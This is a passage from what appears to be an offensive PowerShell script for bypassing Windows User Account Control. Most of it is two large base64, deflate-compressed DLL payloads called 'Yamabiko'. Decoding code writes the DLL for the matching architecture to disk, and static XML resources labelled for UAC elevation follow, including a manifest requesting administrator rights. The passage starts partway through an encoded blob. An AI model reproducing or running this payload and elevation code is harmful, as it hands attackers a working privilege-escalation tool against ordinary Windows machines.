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\r\n'@\r\n    \r\n        $yamabiko64 = @'\r\n        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    +RQlqGmqxl8XME  +tHuCudV0hRyoEvdwQ2eFgglRUE3u8XKz0HfXV4p1axyrYG0KdRjd72BZWEvwNLxQhf1IzfzzQISrwqvHcUwXyqzjSMjGjG0aD6ViHPti3Hqlam6zEe9R1CH7klBQcIbN4ryaTP6NhfmqEuykgDXcNnG/m4FiOSUwn8wnZrIAEcnXUMo/9M9a5DEPSEmJM0rNZ7E2npKjrOMsldaUlZZKGAslkbi0E08hhSaNAeqRT2rZGHaCpL9Q5msRZFF8tKezf0pF8PHg4i72uS/lvPjniLyhY9CKMU6KCsvmvdjglmi  wYVmTDr6ZSqoKugZuX1HHzpzy/d8Q/tTR7Lh2RBzRRG40OySnqlAxfWjbnhNnHolJBIpu4FySsk0Qruag8xhPWSSmVBXypdIZ1EfMfBtJZjpiW01MVpcN6Tpjd8T72Dyhl0wNqSpSV4tTVmppJFyeaWgtOikWimP5NSexVYqW09+rFaduYDflFRVXkGFs +kSZTezQRpqBnU1ixqXI81fyNyGQCZ881xbZu0RiaWpCn5hdkCWyVj7i3QSdi5jEsRWNDEmymW5OHRXYLuHUrEutUAzAo5kG6NRXGruebU97KpqO +lV8uGkElMGTE1W16vvMrWDd1xF5Ycn1c9w2gH7UlxdiWAVXU4hZJLIRnro1lmZ6xUDzrEgsTWYF2WdOLeHJZndKIRQ6ziQD7vhmO2QusEwJ8VGepzJZl8xayMz0gi4OKqhtyrAOja1Bh70Fw/VHcPB09zWhPioN6NiWThm/JhuHrWVqPpKVkhXWTvHUuR+2ZXy77Pbfcduh1ZH5Hs8Tm9Pt7T84w3zTTcB2sM6yns+uCI2lRiQeVYVlTFfY+jDly6uvpYoyQqi6FkJ1EY0FSNrK9lPZlx77s    +XqitcF1ncFIawv/oslH29/Fxr57u/3j5rcMP9r+3rcZ/JNyHrgw9o3K07AvzK/j34fstkhnn/8dskifPXNK4kQ6c43se5WvzZjMueS7RBfWTZ6/NoN9DrOPotSPv0H+jaowdVEnzsP4245jtj06848fMN6DeU0m98IE00zKU8O3lTOYRJQM0viXSgfBJlOSJDArlGCfV6OjuEwzLQNO5/sB/q3O5TQX6X7IpChNIuRHURsRZ   +Z3SjciZwvOZbRmBBri1MTT22keyuX0BACdYlx/GlIySinZ8oyLfXNLBo8Klm7+tVX2XS22NdOsPJ6+7BdTJ8u3QN+pgPl1VXY+G/Lsugwuq4A7mVfjYn1sU+jTKBNB/iCX9vPvfI3y2rIvgLHvSU9N89AipJ6IfQv/KtkyHC2eOFuOo1Jt00b10NeV5ZKzdcxdo1Kyrk1gYN  +JpYnrNNsqThm0rVF0X6Ze5zLeloVlilu0uD0DvHf1gUmz6DVEDfzj2j3IZX1DR75YcH9nz7yPf317pTCSSnpYeIuQblXj0qbmRo+kxNQ4BvBVjb097YtPa/SwSW1cZD/lX9U4KumNwpn1c1ZiIimlBpKjHhAo    +qrGjKas0FmQKuqLU3JMU3U1YSxGfLJC1FNNw0sbPSlRkROI0/rytYHK41mJuTJ7qzehZtmOr8DWejwvh5K6FMtosjGaPUeKJm3NQIsUZ7GynJQGJX0iMz87OIKi/Geg0rCU9CTZ31WNIsK7YXWLpDV6MrIvxkKTVY0JMalLjZ4lk0qWlNaycklBnVYumbg41mxLcu2Gkyl+6e9v+z8=\r\n'@\r\n    \r\n        if ($env:PROCESSOR_ARCHITECTURE -eq \"AMD64\") {\r\n            $Stream = new-object -TypeName System.IO.MemoryStream\r\n            $DeflateStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($yamabiko64),[IO.Compression.CompressionMode]::Decompress)\r\n            $buffer = New-Object Byte[](32768)\r\n            $count = 0\r\n            do\r\n                {\r\n                    $count = $DeflateStream.Read($buffer, 0, 1024)\r\n                    if ($count -gt 0)\r\n                        {\r\n                            $Stream.Write($buffer, 0, $count)\r\n                        }\r\n                }\r\n            While ($count -gt 0)\r\n            $array = $stream.ToArray()\r\n            $DeflateStream.Close()\r\n            $Stream.Close()\r\n            Set-Content -value $array -encoding byte -path $DllPath\r\n            echo \"[+] 64-bit Yamabiko: $DllPath\"\r\n        }\r\n        else {\r\n            $Stream = new-object -TypeName System.IO.MemoryStream\r\n            $DeflateStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($yamabiko32),[IO.Compression.CompressionMode]::Decompress)\r\n            $buffer = New-Object Byte[](32256)\r\n            $count = 0\r\n            do\r\n                {\r\n                    $count = $DeflateStream.Read($buffer, 0, 1024)\r\n                    if ($count -gt 0)\r\n                        {\r\n                            $Stream.Write($buffer, 0, $count)\r\n                        }\r\n                }\r\n            While ($count -gt 0)\r\n            $array = $stream.ToArray()\r\n            $DeflateStream.Close()\r\n            $Stream.Close()\r\n            Set-Content -value $array -encoding byte -path $DllPath\r\n            echo \"[+] 32-bit Yamabiko: $DllPath\"\r\n        }\r\n    \r\n    }\r\n    \r\n    #---------------\r\n    # Static resources used for UAC elevation\r\n    #---------------\r\n    $WinPackageData = @\"\r\n    <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n    <unattend xmlns=\"urn:schemas-microsoft-com:unattend\">\r\n        <servicing>\r\n            <package action=\"install\">\r\n                <assemblyIdentity  name=\"Package_1_for_KB929761\" version=\"6.0.1.1\" language=\"neutral\" processorArchitecture=\"x86\" publicKeyToken=\"31bf3856ad364e35\"/>\r\n                <source location=\"%configsetroot%\\Windows6.0-KB929761-x86.CAB\" />\r\n            </package>\r\n         </servicing>\r\n    </unattend>\r\n\"@\r\n    \r\n    $WinManifestData = @\"\r\n    <?xml version='1.0' encoding='utf-8' standalone='yes'?>\r\n    <assembly\r\n        xmlns=\"urn:schemas-microsoft-com:asm.v1\"\r\n        xmlns:asmv3=\"urn:schemas-microsoft-com:asm.v3\"\r\n        manifestVersion=\"1.0\"\r\n        >\r\n       <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n        <security>\r\n          <requestedPrivileges>\r\n            <requestedExecutionLevel\r\n                level=\"requireAdministrator\"\r\n                uiAccess=\"false\"\r\n                />\r\n          </requestedPrivileges>\r\n        </security>\r\n      </trustInfo>\r\n      